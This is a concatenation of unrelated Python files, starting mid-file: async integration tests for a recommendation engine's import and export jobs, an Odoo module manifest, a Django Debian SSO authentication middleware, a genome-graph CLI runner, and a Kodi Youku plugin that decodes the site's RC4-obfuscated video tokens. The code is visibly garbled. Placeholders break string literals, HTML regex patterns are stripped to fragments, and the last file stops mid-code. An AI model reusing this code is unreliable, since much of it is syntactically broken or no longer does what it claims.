headers=headers_without_content_type)\n\n resp = await _wait_job_finish(client, headers_without_content_type, \'import_data\')\n\n assert await resp.json() == {\n \'status\': \'done\',\n \'result\': {\'lines_count\': 3},\n \'time_info\': {\n \'elapsed\': \'0:00\',\n \'start\': \'1900-01-01 00:00\',\n \'end\': \'1900-01-01 00:00\'\n }\n }\n\n async def test_importer_get_with_error(self, init_db, headers_without_content_type, client, monkeypatch):\n set_patches(monkeypatch)\n monkeypatch.setattr(\'tests.integration.fixtures.TopSellerArrayTest.get_data\',\n mock.MagicMock(side_effect=Exception(\'testing\')))\n client = await client\n await client.post(\'/engine_objects/1/import_data\', headers=headers_without_content_type)\n\n resp = await _wait_job_finish(client, headers_without_content_type, \'import_data\')\n\n assert await resp.json() == {\n \'status\': \'error\',\n \'result\': {\'message\': \'testing\', \'name\': \'Exception\'},\n \'time_info\': {\n \'elapsed\': \'0:00\',\n \'start\': \'1900-01-01 00:00\',\n \'end\': \'1900-01-01 00:00\'\n }\n }\n\n\nasync def _post_products(client, headers, headers_without_content_type, products=[{\'sku\': \'test\'}]):\n resp = await client.post(\'/item_types/1/items?store_id=1\',\n data=ujson.dumps(products), headers=headers)\n resp = await client.post(\'/item_types/1/update_filters?store_id=1\',\n headers=headers_without_content_type)\n\n sleep(0.05)\n while True:\n resp = await client.get(\n \'/item_types/1/update_filters?store_id=1&PI:KEY\',\n headers=headers_without_content_type)\n if (await resp.json())[\'status\'] != \'running\':\n break\n\n return resp\n\n\ndef set_readers_builders_patch(monkeypatch, values=None):\n if values is None:\n values = [[ujson.dumps({\'value\': 1, \'item_key\': \'test\'}).encode()]]\n\n readers_builder = values\n mock_ = mock.MagicMock()\n mock_.return_value = readers_builder\n\n monkeypatch.setattr(\n \'myreco.engine_objects.object_base.EngineObjectBase._build_csv_readers\',\n mock_\n )\n\n\nclass TestEngineObjectsModelsObjectsExporter(object):\n\n async def test_exporter_post(self, init_db, headers_without_content_type, headers, client, monkeypatch):\n set_patches(monkeypatch)\n set_readers_builders_patch(monkeypatch)\n \n client = await client\n await _post_products(client, headers, headers_without_content_type)\n resp = await client.post(\'/engine_objects/1/export\', headers=headers_without_content_type)\n\n assert await resp.json() == {\'job_hash\': \'6342e10bd7dca3240c698aa79c98362e\'}\n await _wait_job_finish(client, headers_without_content_type)\n\n async def test_exporter_get_running(self, init_db, headers_without_content_type, headers, client, monkeypatch, loop):\n set_patches(monkeypatch)\n\n prods = [ujson.dumps({\'value\': i, \'item_key\': \'test{}\'.format(i)}).encode() for i in range(100)]\n set_readers_builders_patch(monkeypatch, [[b\'\\n\'.join(prods)]])\n\n client = await client\n products = [{\'sku\': \'test{}\'.format(i)} for i in range(10)]\n\n await _post_products(client, headers, headers_without_content_type, products)\n await client.post(\'/engine_objects/1/export\', headers=headers_without_content_type)\n\n resp = await client.get(\n \'/engine_objects/1/export?PI:KEY\', headers=headers_without_content_type)\n\n assert await resp.json() == {\'status\': \'running\'}\n await _wait_job_finish(client, headers_without_content_type)\n\n async def test_exporter_get_done(self, init_db, headers_without_content_type, headers, client, monkeypatch):\n set_patches(monkeypatch)\n client = await client\n await 
_post_products(client, headers, headers_without_content_type)\n\n set_readers_builders_patch(monkeypatch)\n\n await client.post(\'/engine_objects/1/export\', headers=headers_without_content_type)\n\n resp = await _wait_job_finish(client, headers_without_content_type)\n\n assert await resp.json() == {\n \'status\': \'done\',\n \'result\': {\'length\': 1, \'max_sells\': 1, \'min_sells\': 1},\n \'time_info\': {\n \'elapsed\': \'0:00\',\n \'start\': \'1900-01-01 00:00\',\n \'end\': \'1900-01-01 00:00\'\n }\n }\n\n async def test_exporter_get_with_error(\n self, init_db, headers_without_content_type, headers, client, monkeypatch):\n set_patches(monkeypatch)\n client = await client\n await _post_products(client, headers, headers_without_content_type)\n\n set_readers_builders_patch(monkeypatch, [])\n await client.post(\'/engine_objects/1/export\', headers=headers_without_content_type)\n\n resp = await _wait_job_finish(client, headers_without_content_type)\n\n assert await resp.json() == {\n \'status\': \'error\',\n \'result\': {\n \'message\': ""No data found for engine object \'Top Seller Object\'"",\n \'name\': \'EngineError\'\n },\n \'time_info\': {\n \'elapsed\': \'0:00\',\n \'start\': \'1900-01-01 00:00\',\n \'end\': \'1900-01-01 00:00\'\n }\n }\n\n\ndef CoroMock():\n coro = mock.MagicMock(name=""CoroutineResult"")\n corofunc = mock.MagicMock(name=""CoroutineFunction"", side_effect=asyncio.coroutine(coro))\n corofunc.coro = coro\n return corofunc\n\n\ndef set_data_importer_patch(monkeypatch, mock_=None):\n if mock_ is None:\n mock_ = mock.MagicMock()\n\n monkeypatch.setattr(\'tests.integration.fixtures.TopSellerArrayTest.get_data\', mock_)\n return mock_\n\n\nclass TestEngineObjectsModelsObjectsExporterWithImport(object):\n\n async def test_exporter_post_with_import(self, init_db, headers, headers_without_content_type, client, monkeypatch):\n set_patches(monkeypatch)\n client = await client\n await _post_products(client, headers, headers_without_content_type)\n\n set_readers_builders_patch(monkeypatch)\n get_data_patch = set_data_importer_patch(monkeypatch)\n get_data_patch.return_value = {}\n\n resp = await client.post(\'/engine_objects/1/export?import_data=true\',\n headers=headers_without_content_type)\n hash_ = await resp.json()\n\n await _wait_job_finish(client, headers_without_content_type)\n\n called = bool(TopSellerArrayTest.get_data.called)\n TopSellerArrayTest.get_data.reset_mock()\n\n assert hash_ == {\'job_hash\': \'6342e10bd7dca3240c698aa79c98362e\'}\n assert called\n\n async def test_exporter_get_running_with_import(self, init_db, headers, headers_without_content_type, client, monkeypatch):\n set_patches(monkeypatch)\n client = await client\n def func(x, y, z):\n sleep(1)\n return {}\n\n await _post_products(client, headers, headers_without_content_type)\n\n set_readers_builders_patch(monkeypatch)\n set_data_importer_patch(monkeypatch, func)\n await client.post(\'/engine_objects/1/export?import_data=true\',\n headers=headers_without_content_type)\n\n resp = await client.get(\n \'/engine_objects/1/export?PI:KEY\',\n headers=headers_without_content_type)\n\n assert await resp.json() == {\'status\': \'running\'}\n await _wait_job_finish(client, headers_without_content_type)\n\n async def test_exporter_get_done_with_import(self, init_db, headers, headers_without_content_type, client, monkeypatch):\n set_patches(monkeypatch)\n client = await client\n await _post_products(client, headers, headers_without_content_type)\n\n set_readers_builders_patch(monkeypatch)\n await 
client.post(\'/engine_objects/1/export?import_data=true\',\n headers=headers_without_content_type)\n\n await _wait_job_finish(client, headers_without_content_type)\n\n resp = await client.get(\n \'/engine_objects/1/export?PI:KEY\',\n headers=headers_without_content_type)\n\n assert await resp.json() == {\n \'status\': \'done\',\n \'result\': {\n \'importer\': {\'lines_count\': 3},\n \'exporter\': {\n \'length\': 1,\n \'max_sells\': 1,\n \'min_sells\': 1\n }\n },\n \'time_info\': {\n \'elapsed\': \'0:00\',\n \'start\': \'1900-01-01 00:00\',\n \'end\': \'1900-01-01 00:00\'\n }\n }\n\n async def test_exporter_get_with_error_in_import_with_import(\n self, init_db, headers, headers_without_content_type, client, monkeypatch):\n set_patches(monkeypatch)\n client = await client\n await _post_products(client, headers, headers_without_content_type)\n\n get_data_patch = set_data_importer_patch(monkeypatch)\n get_data_patch.side_effect = Exception(\'testing\')\n await client.post(\'/engine_objects/1/export?import_data=true\', headers=headers_without_content_type)\n\n await _wait_job_finish(client, headers_without_content_type)\n\n resp = await client.get(\n \'/engine_objects/1/export?PI:KEY\', headers=headers_without_content_type)\n\n assert await resp.json() == {\n \'status\': \'error\',\n \'result\': {\'message\': \'testing\', \'name\': \'Exception\'},\n \'time_info\': {\n \'elapsed\': \'0:00\',\n \'start\': \'1900-01-01 00:00\',\n \'end\': \'1900-01-01 00:00\'\n }\n }\n\n async def test_exporter_get_with_error_in_export_with_import(\n self, init_db, headers, headers_without_content_type, client, monkeypatch):\n set_patches(monkeypatch)\n client = await client\n await _post_products(client, headers, headers_without_content_type)\n\n set_readers_builders_patch(monkeypatch, [])\n await client.post(\'/engine_objects/1/export?import_data=true\', headers=headers_without_content_type)\n\n await _wait_job_finish(client, headers_without_content_type)\n\n resp = await client.get(\n \'/engine_objects/1/export?PI:KEY\', headers=headers_without_content_type)\n\n assert await resp.json() == {\n \'status\': \'error\',\n \'result\': {\n \'message\': ""No data found for engine object \'Top Seller Object\'"",\n \'name\': \'EngineError\'\n },\n \'time_info\': {\n \'elapsed\': \'0:00\',\n \'start\': \'1900-01-01 00:00\',\n \'end\': \'1900-01-01 00:00\'\n }\n }\n', '# -*- encoding: utf-8 -*-\n#\n# Module Writen to OpenERP, Open Source Management Solution\n#\n# Copyright (c) 2014 Vauxoo - http://www.vauxoo.com/\n# All Rights Reserved.\n# info Vauxoo (dummy@email.com)\n#\n# Coded by: Vauxoo (dummy@email.com)\n#\n#\n# This program is free software: you can redistribute it and/or modify\n# it under the terms of the GNU Affero General Public License as\n# published by the Free Software Foundation, either version 3 of the\n# License, or (at your option) any later version.\n#\n# This program is distributed in the hope that it will be useful,\n# but WITHOUT ANY WARRANTY; without even the implied warranty of\n# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the\n# GNU Affero General Public License for more details.\n#\n# You should have received a copy of the GNU Affero General Public License\n# along with this program. If not, see .\n#\n\n{\n \'name\': \'Runbot sync remote info\',\n \'category\': \'Website\',\n \'summary\': \'Runbot\',\n \'version\': \'1.0\',\n \'description\': """"""This module create a connection with\n remote host of git to sync information.\n e.g. Status of pull request\n e.g. 
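# (CoroMock(), defined in the test module above, wraps a MagicMock in
#  asyncio.coroutine so an awaitable can be stubbed and asserted on; typical
#  hedged usage, names assumed:
#      fetch = CoroMock()
#      fetch.coro.return_value = 42
#      assert loop.run_until_complete(fetch()) == 42
#      fetch.coro.assert_called_once_with()
#  )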
name source branch of a pull request"""""",\n \'author\': \'Vauxoo\',\n \'depends\': [\'runbot\'],\n \'external_dependencies\': {\n },\n \'data\': [\n \'data/ir_cron_data.xml\',\n \'view/runbot_view.xml\',\n ],\n \'installable\': True,\n}\n', '# Copyright 2013 The Distro Tracker Developers\n# See the COPYRIGHT file at the top-level directory of this distribution and\n# at http://deb.li/DTAuthors\n#\n# This file is part of Distro Tracker. It is subject to the license terms\n# in the LICENSE file found in the top-level directory of this\n# distribution and at http://deb.li/DTLicense. No part of Distro Tracker,\n# including this file, may be copied, modified, propagated, or distributed\n# except according to the terms contained in the LICENSE file.\n\nfrom __future__ import unicode_literals\nfrom django.contrib.auth.middleware import RemoteUserMiddleware\nfrom django.contrib.auth.backends import RemoteUserBackend\nfrom django.contrib import auth\nfrom pts.accounts.models import UserEmail\nfrom pts.core.utils import get_or_none\nfrom pts.accounts.models import User\n\nimport ldap\n\n\nclass DebianSsoUserMiddleware(RemoteUserMiddleware):\n """"""\n Middleware that initiates user authentication based on the REMOTE_USER\n field provided by Debian\'s SSO system.\n\n If the currently logged in user is a DD (as identified by having a @debian.org\n address), he is forcefully logged out if the header is no longer found or is\n invalid.\n """"""\n header = \'REMOTE_USER\'\n\n def extract_email(self, username):\n parts = [part for part in username.split(\':\') if part]\n federation, jurisdiction = parts[:2]\n if (federation, jurisdiction) != (\'DEBIANORG\', \'DEBIAN\'):\n return\n\n return parts[-1] + dummy@email.com\'\n\n def is_debian_user(self, user):\n return any(\n email.email.endswith(dummy@email.com\')\n for email in user.emails.all()\n )\n\n def log_out_user(self, request):\n if request.user.is_authenticated():\n if self.is_debian_user(request.user):\n auth.logout(request)\n\n def process_request(self, request):\n if self.header not in request.META:\n # If a user is logged in to the PTS by Debian SSO, sign him out\n self.log_out_user(request)\n return\n\n username = request.META[self.header]\n if not username:\n self.log_out_user(request)\n return\n email = self.extract_email(username)\n\n if request.user.is_authenticated():\n if request.user.emails.filter(email=email).exists():\n # The currently logged in user matches the one given by the\n # headers.\n return\n\n user = auth.authenticate(remote_user=email)\n if user:\n request.user = user\n auth.login(request, user)\n\n\nclass DebianSsoUserBackend(RemoteUserBackend):\n """"""\n The authentication backend which authenticates the provided remote user\n (identified by his @debian.org email) in the PTS. If a matching User\n model instance does not exist, one is automatically created. 
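# (extract_email() above parses the colon-separated REMOTE_USER value set by
#  Debian's SSO, e.g. 'DEBIANORG:DEBIAN:jdoe': anything outside the
#  DEBIANORG/DEBIAN federation+jurisdiction pair is rejected, and the trailing
#  uid is suffixed into the user's @debian.org address. The sample header
#  value is an assumption for illustration.)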
In that case\n the DDs first and last name are pulled from Debian\'s LDAP.\n """"""\n def authenticate(self, remote_user):\n if not remote_user:\n return\n\n email = remote_user\n\n email_user = get_or_none(UserEmail, email=email)\n if not email_user:\n names = self.get_user_details(remote_user)\n kwargs = {}\n if names:\n kwargs.update(names)\n user = User.objects.create_user(main_email=email, **kwargs)\n else:\n user = email_user.user\n\n return user\n\n def get_uid(self, remote_user):\n # Strips off the @debian.org part of the email leaving the uid\n return remote_user[:-11]\n\n def get_user_details(self, remote_user):\n """"""\n Gets the details of the given user from the Debian LDAP.\n :return: Dict with the keys ``first_name``, ``last_name``\n ``None`` if the LDAP lookup did not return anything.\n """"""\n l = ldap.initialize(\'ldap://db.debian.org\')\n result_set = l.search_s(\n \'dc=debian,dc=org\',\n ldap.SCOPE_SUBTREE,\n \'uid={}\'.format(self.get_uid(remote_user)),\n None)\n if not result_set:\n return None\n\n result = result_set[0]\n return {\n \'first_name\': result[1][\'cn\'][0].decode(\'utf-8\'),\n \'last_name\': result[1][\'sn\'][0].decode(\'utf-8\'),\n }\n\n def get_user(self, user_id):\n try:\n return User.objects.get(pk=user_id)\n except User.DoesNotExist:\n return None\n', '#!/usr/bin/env python3\n# -*- coding: utf-8 -*-\n# (c) Camille Scott, 2019\n# File : cdbg_stream.py\n# License: MIT\n# Author : Camille Scott dummy@email.com\n# Date : 11.03.2020\n\nfrom goetia import libgoetia\n\nfrom goetia.cdbg import (compute_connected_component_callback,\n compute_unitig_fragmentation_callback,\n write_cdbg_metrics_callback,\n write_cdbg_callback)\nfrom goetia.dbg import get_graph_args, process_graph_args\nfrom goetia.parsing import get_fastx_args, iter_fastx_inputs\nfrom goetia.processors import AsyncSequenceProcessor, at_modulo_interval\nfrom goetia.messages import (Interval, SampleStarted, SampleFinished, Error, AllMessages)\nfrom goetia.metadata import CUR_TIME\nfrom goetia.serialization import cDBGSerialization\n\nfrom goetia.cli.args import get_output_interval_args, print_interval_settings\nfrom goetia.cli.runner import CommandRunner\n\nimport curio\n\nimport os\nimport sys\n\n\nclass cDBGRunner(CommandRunner):\n\n def __init__(self, parser):\n get_graph_args(parser)\n get_cdbg_args(parser)\n get_output_interval_args(parser)\n\n group = get_fastx_args(parser)\n group.add_argument(\'-o\', dest=\'output_filename\', default=\'/dev/stdout\')\n group.add_argument(\'-i\', \'--inputs\', dest=\'inputs\', nargs=\'+\', required=True)\n\n parser.add_argument(\'--echo\', default=None,\n help=\'echo all events to the given file.\')\n parser.add_argument(\'--curio-monitor\', default=False, action=\'store_true\',\n help=\'Run curio kernel monitor for async debugging.\')\n parser.add_argument(\'--verbose\', default=False, action=\'store_true\')\n\n super().__init__(parser)\n\n def postprocess_args(self, args):\n process_graph_args(args)\n process_cdbg_args(args)\n\n def setup(self, args):\n os.makedirs(args.results_dir, exist_ok=True)\n\n self.dbg_t = args.graph_t\n self.hasher = args.hasher_t(args.ksize)\n self.storage = args.storage.build(*args.storage_args)\n self.dbg = args.graph_t.build(self.storage, self.hasher)\n\n self.cdbg_t = libgoetia.cdbg.cDBG[type(self.dbg)]\n\n self.compactor_t = libgoetia.cdbg.StreamingCompactor[type(self.dbg)]\n\n self.compactor = self.compactor_t.Compactor.build(self.dbg)\n\n if args.normalize:\n self.file_processor = 
self.compactor_t.NormalizingCompactor[FastxReader].build(self.compactor,\n args.normalize,\n args.interval)\n else:\n self.file_processor = self.compactor_t.Processor.build(self.compactor,\n args.interval)\n \n # Iterator over samples (pairs or singles, depending on pairing-mode)\n sample_iter = iter_fastx_inputs(args.inputs, args.pairing_mode, names=args.names)\n # AsyncSequenceProcessor does event management and callback for the FileProcessors\n self.processor = AsyncSequenceProcessor(self.file_processor, sample_iter, args.echo)\n # Subscribe a listener to the FileProcessor producer\n self.worker_listener = self.processor.add_listener(\'worker_q\', \'cdbg.consumer\')\n\n #\n # Register callbacks for data outputs.\n # Track a list of files that need to be closed with a ]\n # when we\'re done.\n # \n self.to_close = []\n\n if args.track_cdbg_metrics:\n self.worker_listener.on_message(Interval,\n write_cdbg_metrics_callback,\n self.compactor,\n args.track_cdbg_metrics,\n args.verbose)\n self.to_close.append(args.track_cdbg_metrics)\n\n\n if args.track_unitig_bp:\n if args.unitig_bp_bins is None:\n bins = [args.ksize, 100, 200, 500, 1000]\n else:\n bins = args.unitig_bp_bins\n \n self.worker_listener.on_message(Interval,\n at_modulo_interval(compute_unitig_fragmentation_callback,\n modulus=args.unitig_bp_tick),\n self.cdbg_t,\n self.compactor.cdbg,\n args.track_unitig_bp,\n bins,\n verbose=args.verbose)\n self.to_close.append(args.track_unitig_bp)\n\n\n if args.track_cdbg_components:\n self.worker_listener.on_message(Interval,\n at_modulo_interval(compute_connected_component_callback,\n modulus=args.cdbg_components_tick),\n self.cdbg_t,\n self.compactor.cdbg,\n args.track_cdbg_components,\n args.component_sample_size,\n verbose=args.verbose)\n self.to_close.append(args.track_cdbg_components)\n\n if args.save_cdbg:\n for cdbg_format in args.save_cdbg_format:\n self.worker_listener.on_message(Interval,\n at_modulo_interval(write_cdbg_callback,\n modulus=args.cdbg_tick),\n args.save_cdbg,\n cdbg_format,\n verbose=args.verbose)\n self.worker_listener.on_message(SampleFinished,\n write_cdbg_callback,\n args.save_cdbg,\n cdbg_format,\n verbose=args.verbose)\n\n # Close all files when done\n async def close_files(msg, files):\n for file_name in files:\n async with curio.aopen(file_name, \'a\') as fp:\n await fp.write(\'\\n]\\n\')\n\n self.worker_listener.on_message(SampleFinished, close_files, self.to_close)\n\n #\n # Regular diagnostics output\n # \n\n def info_output(msg):\n info = f\'{msg.msg_type}: {getattr(msg, ""state"", """")}\'\\\n f\'\\n\\tSample: {msg.sample_name}\'\\\n f\'\\n\\tSequences: {msg.sequence}\'\\\n f\'\\n\\tk-mers: {msg.t}\'\n if msg.msg_type == \'Error\':\n info += f\'\\n\\tError: {msg.error}\'\n\n print(info, file=sys.stderr)\n\n self.worker_listener.on_message(AllMessages, info_output)\n \n def execute(self, args):\n curio.run(self.processor.start, with_monitor=args.curio_monitor)\n\n def teardown(self):\n pass\n\n\ndef get_cdbg_args(parser):\n default_prefix = \'goetia.build-cdbg.\' + CUR_TIME\n parser.default_prefix = default_prefix\n group = parser.add_argument_group(\'cDBG\')\n\n group.add_argument(\'--results-dir\',\n default=default_prefix)\n\n group.add_argument(\'--normalize\',\n type=int,\n nargs=\'?\',\n const=10)\n\n group.add_argument(\'--save-cdbg\',\n metavar=\'PREFIX.\',\n nargs=\'?\',\n const=\'goetia.cdbg.graph\',\n help=\'Save a copy of the cDBG.\')\n group.add_argument(\'--save-cdbg-format\',\n nargs=\'+\',\n choices=cDBGSerialization.FORMATS,\n 
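# (at_modulo_interval(), used when registering the Interval callbacks above,
#  decorates a callback so it only fires every Nth tick -- conceptually
#  'ticks += 1; if ticks % modulus == 0: callback(...)' -- keeping expensive
#  outputs such as component sampling off the per-interval hot path. This is
#  a paraphrase of the goetia helper, not its exact implementation.)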
default=[\'gfa1\'])\n group.add_argument(\'--cdbg-tick\',\n type=int,\n default=10,\n help=\'Save every N interval ticks.\')\n\n group.add_argument(\'--track-cdbg-metrics\',\n metavar=\'FILE_NAME.json\',\n nargs=\'?\',\n const=\'goetia.cdbg.stats.json\',\n help=\'Output basic cDBG metrics.\')\n group.add_argument(\'--cdbg-metrics-tick\',\n type=int,\n default=5,\n help=\'Output every N interval ticks.\')\n\n group.add_argument(\'--track-cdbg-components\',\n metavar=\'FILE_NAME.json\',\n nargs=\'?\',\n const=\'goetia.cdbg.components.json\',\n help=\'Save the distribution of component sizes.\')\n group.add_argument(\'--component-sample-size\',\n type=int,\n default=10000,\n help=\'Number of components to sample for size.\')\n group.add_argument(\'--cdbg-components-tick\',\n type=int,\n default=5,\n help=\'Sample and save distribution every N interval ticks.\')\n\n group.add_argument(\'--track-unitig-bp\',\n metavar=\'FILENAME.json\',\n nargs=\'?\',\n const=\'goetia.cdbg.unitigs.bp.json\',\n help=\'Track the distribution of unitig sizes.\')\n group.add_argument(\'--unitig-bp-bins\',\n nargs=\'+\',\n type=int,\n help=\'Bin sizes of distribution.\')\n group.add_argument(\'--unitig-bp-tick\',\n type=int,\n default=10)\n\n group.add_argument(\'--validate\',\n metavar=\'FILENAME.csv\',\n nargs=\'?\',\n const=\'goetia.cdbg.validation.csv\')\n\n return group\n\n\ndef process_cdbg_args(args):\n\n def join(p):\n return p if p is None else os.path.join(args.results_dir, p)\n\n args.track_cdbg_stats = join(args.track_cdbg_metrics)\n args.track_cdbg_components = join(args.track_cdbg_components)\n args.save_cdbg = join(args.save_cdbg)\n args.track_cdbg_unitig_bp = join(args.track_unitig_bp)\n\n\ndef print_cdbg_args(args):\n print(\'* cDBG Params\', file=sys.stderr)\n print(\'* Directory: \', args.results_dir, file=sys.stderr)\n if args.save_cdbg:\n print(\'* Saving cDBG every {0} sequences with file prefix {1}\'.format(args.coarse_interval,\n args.save_cdbg),\n file=sys.stderr)\n print(\'* cDBG save formats: {0}\'.format(\', \'.join(args.save_cdbg_format)))\n if args.track_cdbg_stats:\n print(\'* Tracking cDBG stats and reporting every {0} sequences\'.format(args.fine_interval),\n file=sys.stderr)\n print(\'* Saving tracking information to\', args.track_cdbg_stats, file=sys.stderr)\n if args.track_cdbg_history:\n print(\'* Tracking cDBG history and saving to\', args.track_cdbg_history, file=sys.stderr)\n if args.validate:\n print(\'* cDBG will be validated on completion and results saved to\', args.validate,\n file=sys.stderr)\n print(\'*\', \'*\' * 10, \'*\', sep=\'\\n\', file=sys.stderr)\n\n\n', '\ufeff# -*- coding: utf-8 -*-\nimport xbmc, xbmcgui, xbmcplugin, xbmcaddon, urllib2, urllib, re, string, sys, os, gzip, StringIO, math, urlparse\nimport base64, time, cookielib\nimport simplejson\n\n# Plugin constants \n__addon__ = xbmcaddon.Addon()\n__addonname__ = __addon__.getAddonInfo(\'name\')\n__profile__ = xbmc.translatePath( __addon__.getAddonInfo(\'profile\') ).decode(""utf-8"")\n\nUserAgent = \'Mozilla/5.0 (compatible; MSIE 10.0; Windows NT 6.1; Trident/6.0)\'\nORDER_LIST1 = [[\'1\',\'最多播放\'], [\'2\',\'最多评论\'], [\'4\',\'最受欢迎\'], [\'5\',\'最近上映\'], [\'6\',\'最近更新\']]\nDAYS_LIST1 = [[\'1\',\'今日\'], [\'2\',\'本周\'], [\'4\',\'历史\']]\nORDER_LIST2 = [[\'1\',\'最多播放\'], [\'2\',\'最新发布\'], [\'3\',\'最多评论\'], [\'4\',\'最多收藏\'], [\'5\',\'最受欢迎\']]\nDAYS_LIST2 = [[\'1\',\'今日\'], [\'2\',\'本周\'], [\'3\',\'本月\'], [\'4\',\'历史\']]\n\nclass youkuDecoder:\n def __init__( self ):\n return\n\n def getFileIDMixString(self,seed): 
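# The method below builds a deterministic permutation of the source alphabet
# from `seed` with a small linear congruential generator
# (seed = (seed * 211 + 30031) % 65536); the same seed always produces the
# same shuffle, which is what lets getFileId() invert the mixing.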
\n mixed = [] \n source = list(""abcdefghijklmnopqrstuvwxyzABCDEFGHIJKLMNOPQRSTUVWXYZ/\\:._-1234567890"") \n seed = float(seed) \n for i in range(len(source)): \n seed = (seed * 211 + 30031 ) % 65536 \n index = math.floor(seed /65536 *len(source)) \n mixed.append(source[int(index)]) \n source.remove(source[int(index)]) \n return mixed \n\n def getFileId(self,fileId,seed): \n mixed = self.getFileIDMixString(seed) \n ids = fileId.split(\'*\') \n realId = [] \n for i in range(0,len(ids)-1):\n realId.append(mixed[int(ids[i])]) \n return \'\'.join(realId)\n\n def trans_e(self, a, c):\n b = range(256)\n f = 0\n result = \'\'\n h = 0\n while h < 256:\n f = (f + b[h] + ord(a[h % len(a)])) % 256\n b[h], b[f] = b[f], b[h]\n h += 1\n q = f = h = 0\n while q < len(c):\n h = (h + 1) % 256\n f = (f + b[h]) % 256\n b[h], b[f] = b[f], b[h]\n result += chr(ord(c[q]) ^ b[(b[h] + b[f]) % 256])\n q += 1\n return result\n\n def trans_f(self, a, c):\n """"""\n :argument a: list\n :param c:\n :return:\n """"""\n b = []\n for f in range(len(a)):\n i = ord(a[f][0]) - 97 if ""a"" <= a[f] <= ""z"" else int(a[f]) + 26\n e = 0\n while e < 36:\n if c[e] == i:\n i = e\n break\n e += 1\n v = i - 26 if i > 25 else chr(i + 97)\n b.append(str(v))\n return \'\'.join(b)\n\n f_code_1 = \'becaf9be\'\n f_code_2 = \'bf7e5f01\'\n\n def _calc_ep(self, sid, fileId, token):\n ep = self.trans_e(self.f_code_2, \'%s_%s_%s\' % (sid, fileId, token))\n return base64.b64encode(ep)\n\n def _calc_ep2(self, vid, ep):\n e_code = self.trans_e(self.f_code_1, base64.b64decode(ep))\n sid, token = e_code.split(\'_\')\n new_ep = self.trans_e(self.f_code_2, \'%s_%s_%s\' % (sid, vid, token))\n return base64.b64encode(new_ep), token, sid\n\n def get_sid(self, ep):\n e_code = self.trans_e(self.f_code_1, base64.b64decode(ep))\n return e_code.split(\'_\')\n\n def generate_ep(self, no, fileid, sid, token):\n ep = urllib.quote(self._calc_ep(sid, fileid, token).encode(\'latin1\'),\n safe=""~()*!.\'""\n )\n return ep\n\ndef log(txt):\n message = \'%s: %s\' % (__addonname__, txt)\n xbmc.log(msg=message, level=xbmc.LOGDEBUG)\n\ndef GetHttpData(url, referer=\'\'):\n log(""%s::url - %s"" % (sys._getframe().f_code.co_name, url))\n req = urllib2.Request(url)\n req.add_header(\'User-Agent\', UserAgent)\n if referer:\n req.add_header(\'Referer\', referer)\n try:\n response = urllib2.urlopen(req)\n httpdata = response.read()\n if response.headers.get(\'content-encoding\', None) == \'gzip\':\n httpdata = gzip.GzipFile(fileobj=StringIO.StringIO(httpdata)).read()\n charset = response.headers.getparam(\'charset\')\n response.close()\n except:\n log( ""%s (%d) [%s]"" % (\n sys.exc_info()[2].tb_frame.f_code.co_name,\n sys.exc_info()[2].tb_lineno,\n sys.exc_info()[1]\n ))\n return \'\'\n match = re.compile(\'(.+?)\').search(text)\n if match:\n list.append([id, match.group(1)])\n\ndef getList(listpage,id,genre,area,year):\n if id == \'c_95\':\n str1 = \'风格:\'\n str3a = \'发行:\'\n str3b = \'r\'\n elif id == \'c_84\' or id == \'c_87\':\n str1 = \'类型:\'\n str3a = \'出品:\'\n str3b = \'pr\'\n else:\n str1 = \'类型:\'\n str3a = \'时间:\'\n str3b = \'r\'\n match = re.compile(\'(.+?)\' % (str1), re.DOTALL).search(listpage)\n genrelist = re.compile(\'_g_([^_\\.]*)[^>]*>([^<]+)\').findall(match.group(1))\n getCurrent(match.group(1), genrelist, genre)\n if id == \'c_84\' or id == \'c_87\':\n arealist = []\n else:\n match = re.compile(\'(.+?)\', re.DOTALL).search(listpage)\n arealist = re.compile(\'_a_([^_\\.]*)[^>]*>([^<]+)\').findall(match.group(1))\n getCurrent(match.group(1), arealist, 
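# (Note: trans_e() above is a plain RC4 stream cipher -- the first loop is the
#  key schedule over b[0..255], the second is the PRGA XOR pass -- so the
#  f_code_* keys provide obfuscation of the 'ep' parameter, not real secrecy.)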
area)\n match = re.compile(\'(.+?)\' % (str3a), re.DOTALL).search(listpage)\n yearlist = re.compile(\'_%s_([^_\\.]*)[^>]*>([^<]+)\' % (str3b)).findall(match.group(1))\n getCurrent(match.group(1), yearlist, year)\n return genrelist,arealist,yearlist\n\ndef getList2(listpage,genre):\n match = re.compile(\'(.+?)\', re.DOTALL).search(listpage)\n if match:\n genrelist = re.compile(\'
  • ]*>(.+?)
  • \').findall(match.group(1))\n getCurrent(match.group(1), genrelist, genre)\n else:\n genrelist = []\n return genrelist\n\ndef rootList():\n link = GetHttpData(\'http://list.youku.com/\')\n match0 = re.compile(\'(.+?)\', re.DOTALL).search(link)\n match = re.compile(\'
  • (.+?)
  • \', re.DOTALL).findall(match0.group(1))\n totalItems = len(match)\n for path, id, name in match:\n if path == \'show\':\n u = sys.argv[0]+""?mode=1&name=""+urllib.quote_plus(name)+""&id=""+urllib.quote_plus(id)+""&genre=&area=&year=&order=1&days=1&page=1""\n else:\n u = sys.argv[0]+""?mode=11&name=""+urllib.quote_plus(name)+""&id=""+urllib.quote_plus(id)+""&genre=0&year=1&order=1&days=1&page=1""\n li = xbmcgui.ListItem(name)\n xbmcplugin.addDirectoryItem(int(sys.argv[1]),u,li,True,totalItems)\n xbmcplugin.endOfDirectory(int(sys.argv[1]))\n\ndef progList(name,id,page,genre,area,year,order,days):\n url = \'http://list.youku.com/category/show/%s_g_%s_a_%s_s_%s_d_%s_r_%s_p_%s.html\' % (id, genre, area, order, days, year, page)\n link = GetHttpData(url)\n match = re.compile(\'
      (.+?)
    \', re.DOTALL).search(link)\n plist = []\n if match:\n match1 = re.compile(\'([0-9]+)(|)\', re.DOTALL).findall(match.group(1))\n if match1:\n for num, temp in match1:\n if (num not in plist) and (num != page):\n plist.append(num)\n totalpages = int(match1[len(match1)-1][0])\n else:\n totalpages = 1\n match = re.compile(\'
    (.+?)
    \', re.DOTALL).search(link)\n if match:\n listpage = match.group(1)\n else:\n listpage = \'\'\n if id == \'c_95\':\n match = re.compile(\'
    \', re.DOTALL).findall(link)\n else:\n match = re.compile(\'
    (.+?)
